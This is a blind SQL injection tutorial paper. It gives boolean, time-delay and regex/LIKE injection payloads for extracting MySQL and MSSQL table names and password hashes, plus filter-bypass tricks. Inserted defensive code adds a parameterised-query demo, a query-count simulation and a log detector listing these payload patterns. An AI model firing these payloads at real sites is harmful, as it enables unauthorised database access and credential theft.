Blind Sql Injection with Regular Expressions Attack

Site: www.ihteam.net

Authors:
Simone Quatrini
Marco Rondini
Index
Why blind sql injection? ..... 3
How blind sql injection can be used? ..... 3
Testing vulnerability (MySQL & MSSQL) ..... 3
Time attack (MySQL) ..... 3
Time attack (MSSQL) ..... 4
Regexp attack's methodology ..... 5
Finding table name with Regexp attack (MySQL) ..... 5
Finding table name with Regexp attack (MSSQL) ..... 6
Exporting a value with Regexp attack (MySQL) ..... 7
Exporting a value with Regexp attack (MSSQL) ..... 7
Time considerations ..... 8
Bypassing filters ..... 9
Real life example ..... 9
Conclusions ..... 9
Why blind sql injection?
Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. [Wikipedia]
How blind sql injection can be used?
There are several uses for the Blind Sql Injection:
- Testing the vulnerability;
- Finding the table name;
- Exporting a value;
Every technique is based on the 'guess attack', because we only have two different inputs: TRUE or FALSE. Let me explain better...
Testing vulnerability (MySQL & MSSQL)
Let's start with an easy example. We have this type of URL:
site.com/news.php?id=2
It will result in this type of query on the database:
SELECT * FROM news WHERE ID = 2
Now we can try some sql injection techniques, for example the blind sql injection:
site.com/news.php?id=2 and 1=0
The SQL query is now:
SELECT * FROM news WHERE ID = 2 and 1=0
In this case the query will not return anything (FALSE) because 1 is different from 0. Let's do the litmus test: try to get the TRUE statement by forcing the AND to be TRUE:
site.com/news.php?id=2 and 0=0
In this case 0 is equal to 0... Got it! We should now see the original news page. We now know that it is vulnerable to Blind Sql Injection.
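The boolean oracle the litmus test relies on exists only because the id is pasted into the SQL text. The following example (added here, not from the paper) rebuilds the news/ID query in an in-memory SQLite database, once with string concatenation and once with a bound parameter, and checks whether the paper's two probes can still be told apart; the table contents are constructed.

```python
import sqlite3

def make_db():
    """Constructed demo database standing in for the paper's 'news' table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (ID INTEGER, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "first"), (2, "second"), (3, "third")])
    return db

def news_vulnerable(db, id_param):
    """String concatenation: the injected boolean becomes part of the WHERE clause,
    so '2 and 1=0' returns no row while '2 and 0=0' returns the real one."""
    sql = "SELECT * FROM news WHERE ID = " + id_param
    return db.execute(sql).fetchall()

def news_parameterized(db, id_param):
    """Bound parameter: the whole string is compared with ID as one value and is
    never parsed as SQL, so both probes simply match nothing."""
    return db.execute("SELECT * FROM news WHERE ID = ?", (id_param,)).fetchall()

def oracle_differs(fetch, db):
    """True when the paper's 'and 1=0' / 'and 0=0' probes produce different
    result sets, i.e. when a blind boolean oracle exists for this endpoint."""
    false_probe = fetch(db, "2 and 1=0")
    true_probe = fetch(db, "2 and 0=0")
    return false_probe != true_probe

if __name__ == "__main__":
    print("vulnerable oracle:", oracle_differs(news_vulnerable, make_db()))
    print("parameterized oracle:", oracle_differs(news_parameterized, make_db()))
```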
Time attack (MySQL)
When you can't see any kind of result, you must use the time attack.
In this example we will try to obtain the password of the root user in mysql (if you have root privileges on mysql).
The BENCHMARK function is used to sleep for some seconds.
Syntax: BENCHMARK(how many times, thing to do).
When you use it in an IF statement, you will be able to make a time attack in MySQL:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
And so on until you see the BENCHMARK running (a few more seconds of delay). Now proceed with the 2nd character of the password...
Time attack (MSSQL)
In this example we will try to obtain the username of the sysusers table.
A simple way to generate time delays is to take advantage of one of the biggest database problems, the one that has made the development of performance-tuning techniques necessary: heavy queries. All you need to generate a time delay is to access a table that has some records and to build a good query to force the engine to work. In other words, we need to build a query ignoring what the performance best practices recommend. (This technique was made by Chema Alonso, Microsoft Security MVP)
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
Positive result. The condition is true, and the response has a delay of 14 seconds. We actually know that the ASCII value of the first username's letter in the sysusers table is lower than 300.
site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0>(select top 1 ascii(substring(name,1,1)) from sysusers)
Negative result. One-second response delay. We actually know that the ASCII value of the first username's letter in the sysusers table is higher than 0.
And so on for all the possibilities ([...] stands for the heavy count(*) subquery above):
[...]>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)    14 seconds   TRUE
[...]>1 and 0>(select top 1 ascii(substring(name,1,1)) from sysusers)      1 second     FALSE
[...]>1 and 150>(select top 1 ascii(substring(name,1,1)) from sysusers)    14 seconds   TRUE
[...]>1 and 75>(select top 1 ascii(substring(name,1,1)) from sysusers)     1 second     FALSE
[...]>1 and 100>(select top 1 ascii(substring(name,1,1)) from sysusers)    1 second     FALSE
[...]>1 and 110>(select top 1 ascii(substring(name,1,1)) from sysusers)    1 second     FALSE
[...]>1 and 120>(select top 1 ascii(substring(name,1,1)) from sysusers)    14 seconds   TRUE
[...]>1 and 115>(select top 1 ascii(substring(name,1,1)) from sysusers)    1 second     FALSE
[...]>1 and 118>(select top 1 ascii(substring(name,1,1)) from sysusers)    1 second     FALSE
[...]>1 and 119>(select top 1 ascii(substring(name,1,1)) from sysusers)    1 second     FALSE
Then the result is ASCII(119)='w'.
Start with the second letter... and so on!
Regexp attack's methodology
This is our own creation and it is the fastest way to extract information from a database. With this you can save a lot of time and bandwidth!
The methodology is pretty simple: we define a range of numbers/chars/special chars that will be matched with the REGEXP (MySQL) or LIKE (MSSQL) functions.
Let's start with an example because it is simpler to understand.
Finding table name with Regexp attack (MySQL)
In this example we will extract the first matched record of information_schema.tables; you must know the name of the database!
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)
We tested the blind sql injection attack, and if we see the correct page, everything is ok.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[a-z]' LIMIT 0,1)
In this case we know that the first matched record starts with a char between a and z.
This example will show you how to extract the complete name of the record:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[a-n]' LIMIT 0,1)
True
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[a-g]' LIMIT 0,1)
False
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[h-n]' LIMIT 0,1)
True
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[h-l]' LIMIT 0,1)
False
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^m' LIMIT 0,1)
False
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^n' LIMIT 0,1)
True
The first letter of the table is 'n'. But are there other tables that start with 'n'? Let's change the limit to 1,1:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^n' LIMIT 1,1)
False
No, there are no more tables that start with 'n'. From now on we must change the regular expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE
To test if we found the correct table name, we must test something like this: '^news$'.
Finding table name with Regexp attack (MSSQL)
For MSSQL, the syntax is a little bit more complicated. There are two limitations: LIMIT and REGEXP are not present. To bypass them, we must use the TOP and LIKE functions. See this example:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' and table_name LIKE '[a-z]%' )
True
SELECT TOP is used to extract the first x records from the information_schema table.
In MSSQL, the LIKE function is similar to the REGEXP function in MySQL, but the syntax is not equal. To learn more about the LIKE function consult http://msdn.microsoft.com/en-us/library/ms179859.aspx .
When you need to grab the second table_name, you must use "table_name NOT IN ( SELECT TOP x table_name FROM information_schema.tables)" like in the example below:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' and table_name NOT IN ( SELECT TOP 1 table_name FROM information_schema.tables) and table_name LIKE '[a-z]%' )
The second SELECT TOP is used to exclude the first X rows and extract the (X+1)th.
Like in the MySQL example, we show how to modify the LIKE expression to extract the first row:
'n[a-z]%' -> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> TRUE
Unlike the MySQL ending, here we have TRUE because '%' matches any string of zero or more characters.
To check the end, we must append "_" and verify whether another character exists.
'news%' TRUE -> 'news_' FALSE
Exporting a value with Regexp attack (MySQL)
In this example we will extract a MD5 hash from a known table name (in this case 'users');
Remember: MD5 can ONLY contain [a-f0-9] values.
We will use the same methodology described in the "Finding table name" section.
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[a-f]' AND ID=1)
False
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[0-9]' AND ID=1)
True
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[0-4]' AND ID=1)
False
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[5-9]' AND ID=1)
True
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[5-7]' AND ID=1)
True
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^5' AND ID=1)
True
Our hash starts with '5' in just 6 tries!
Exporting a value with Regexp attack (MSSQL)
Same thing as MySQL and "Finding Table name". We now continue the search of the second char. An example below:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[a-f]%' AND ID=1)
True
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[a-c]%' AND ID=1)
False
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[d-f]%' AND ID=1)
True
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[d-e]%' AND ID=1)
False
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5f%' AND ID=1)
True
We have found that our second char is 'f' in just 5 tries! (This is also the worst case for brute-force)
Time considerations
Take for example the MD5 case. We must export a hash of 32 chars using a blind sql injection.
You know that there are only 16 chars to be tested (1234567890abcdef);
In an optimistic case, regexp and normal blind need 32 queries to be done;
In a worst case, regexp needs 128 queries and normal blind needs 512 queries;
Let's take now a password case. We must export a 15 chars password mixalpha-numeric-special14. You know that there are 76 chars to be tested (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=);
In an optimistic case, regexp and normal blind need 15 queries to be done;
In a worst case, regexp needs approx 94 queries and normal blind needs 1140 queries;
[Chart: Regex vs Normal, Max Try and Min Try for the MD5 case (0 to 600 queries)]
[Chart: Regex vs Normal, Max Try and Min Try for the password case (0 to 1400 queries)]
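A local simulation of the range-halving search from the methodology section, added here to check the query counts above and to size the request budget a defender's rate or error-pattern alert has to catch; it is example code written for this edit, not the authors' PHP tool, and its oracle is a Python function standing in for the TRUE/FALSE page, so no query leaves the process. Note that query_bounds counts whole probes per character, which gives 105 for the password case where the text's approximation with an unrounded log2 gives 94.

```python
import math
import string
# The paper's two alphabets: 16 MD5 hex chars and the 76-char mixalpha-numeric-special14
# set, sorted so that a [lo-hi] range is a contiguous slice of the string.
MD5_ALPHABET = "0123456789abcdef"
PASSWORD_ALPHABET = "".join(sorted(string.ascii_letters + string.digits + "!@#$%^&*()-_+="))

def make_oracle(secret, counter):
    """Local stand-in for the TRUE/FALSE page (constructed for this example; nothing is
    sent anywhere). Answers what one REGEXP '^prefix[lo-hi]' probe would answer."""
    def probe(prefix, lo, hi):
        counter[0] += 1
        nxt = secret[len(prefix):len(prefix) + 1]
        return secret.startswith(prefix) and nxt != "" and lo <= nxt <= hi
    return probe

def extract_regexp(length, alphabet, probe):
    """The paper's method: every probe halves the candidate range for one character."""
    found = ""
    for _ in range(length):
        lo, hi = 0, len(alphabet) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(found, alphabet[lo], alphabet[mid]):
                hi = mid
            else:
                lo = mid + 1
        found += alphabet[lo]
    return found

def extract_linear(length, alphabet, probe):
    """'Normal' blind: test one candidate character per probe until it matches."""
    found = ""
    for _ in range(length):
        found += next(ch for ch in alphabet if probe(found, ch, ch))
    return found

def query_costs(secret, alphabet):
    """(regexp probes, linear probes) actually spent recovering `secret`."""
    costs = []
    for method in (extract_regexp, extract_linear):
        counter = [0]
        assert method(len(secret), alphabet, make_oracle(secret, counter)) == secret
        costs.append(counter[0])
    return tuple(costs)

def query_bounds(length, alphabet_size):
    """(best, regexp worst, linear worst) = n, n*ceil(log2 k), n*k; whole probes give 105, not 94."""
    return (length, length * math.ceil(math.log2(alphabet_size)), length * alphabet_size)
```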
Bypassing filters
Below are examples of common filter bypasses.
TRIM (NO SPACES ALLOWED):
SELECT/*not important*/1/*really...*/FROM/*im serious*/users (open and close a comment);
SELECT(1)FROM(information_schema.tables) (parentheses' rules)
Special chars like:
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
Example:
SELECT%09TABLE_NAME%09FROM%0dinformation_schema.tables
SPECIAL CHAR (NO ', " ALLOWED):
Usually the ' and " are used to input some kind of string. So you can input the HEX value:
SELECT passwd FROM users WHERE username=0x61646d696e
Where 0x61646d696e is the hex value of 'admin'
Or also using the CHAR function:
SELECT passwd FROM users WHERE username=CONCAT(CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110))
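Defender-side counterpart to the bypass list above, written for this edit (not the authors' code): it URL-decodes the request target of web-server log lines and flags the request shapes this paper uses, including the comment, control-character, hex and CHAR() substitutions, run here over constructed sample lines rather than real traffic.

```python
import re
from urllib.parse import unquote

# Rules for the request shapes described in this paper: boolean probes, REGEXP/LIKE
# range probes, BENCHMARK and heavy sysusers joins, and the space/quote filter bypasses.
RULES = {
    "boolean_probe":    re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "regexp_range":     re.compile(r"\b(regexp|like)\s*'(\^|[^']*\[[^']*\])", re.I),
    "benchmark_delay":  re.compile(r"\bbenchmark\s*\(", re.I),
    "heavy_self_join":  re.compile(r"(\bsysusers\b.*){4,}", re.I),
    "comment_as_space": re.compile(r"\b(select|from|where|and|union)/\*", re.I),
    "paren_as_space":   re.compile(r"\b(select|from|where)\(", re.I),
    "ctrl_as_space":    re.compile(r"\b(select|from|where|union)[\t\n\x0c\r]", re.I),
    "hex_literal":      re.compile(r"=\s*0x[0-9a-f]{2,}", re.I),
    "char_concat":      re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I),
}

def decode_request(line):
    """Return the URL-decoded request target of a combined-format log line. Decoding
    is what turns %09/%0a/%0c/%0d back into the separators the rules look for."""
    m = re.search(r'"(?:GET|POST) (\S+)', line)
    return unquote(m.group(1)) if m else ""

def classify(line):
    """Names of the rules matching one log line (empty list for benign traffic)."""
    target = decode_request(line)
    return sorted(name for name, rx in RULES.items() if rx.search(target))

# Constructed sample lines (not real traffic), modelled on the paper's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /news.php?id=2 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2009:10:00:01 +0000] "GET /news.php?id=2%20and%201=0 HTTP/1.1" 200 310',
    '10.0.0.5 - - [01/Jan/2009:10:00:02 +0000] "GET /index.php?id=1%20and%201=(SELECT%201%20FROM'
    "%20information_schema.tables%20WHERE%20table_name%20REGEXP%20'%5E%5Ba-n%5D'%20LIMIT%200,1)"
    ' HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2009:10:00:03 +0000] "GET /news.php?id=2%20and%20IF(1=1,'
    'BENCHMARK(100000,SHA1(1)),0) HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2009:10:00:04 +0000] "GET /news.php?id=-1%20UNION%20SELECT%09passwd'
    '%09FROM%0dusers%20WHERE%20username=0x61646d696e HTTP/1.1" 200 5120',
]

def scan(lines=SAMPLE_LOG):
    """Map each suspicious line's position to its matched rule names."""
    hits = {}
    for i, line in enumerate(lines):
        names = classify(line)
        if names:
            hits[i] = names
    return hits
```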
Real life example
You can download an example of PHP code from http://www.ihteam.net/papers/regexp_bsqli.php.tar.gz
Conclusions
To conclude our paper, we must specify that:
1. It is possible to make a "combo" attack using the "Time Attack" or others;
2. The regexp that you will use could also be a list of chars like "[abcdef0123456789]";
3. Our English is fu**ing bad! :)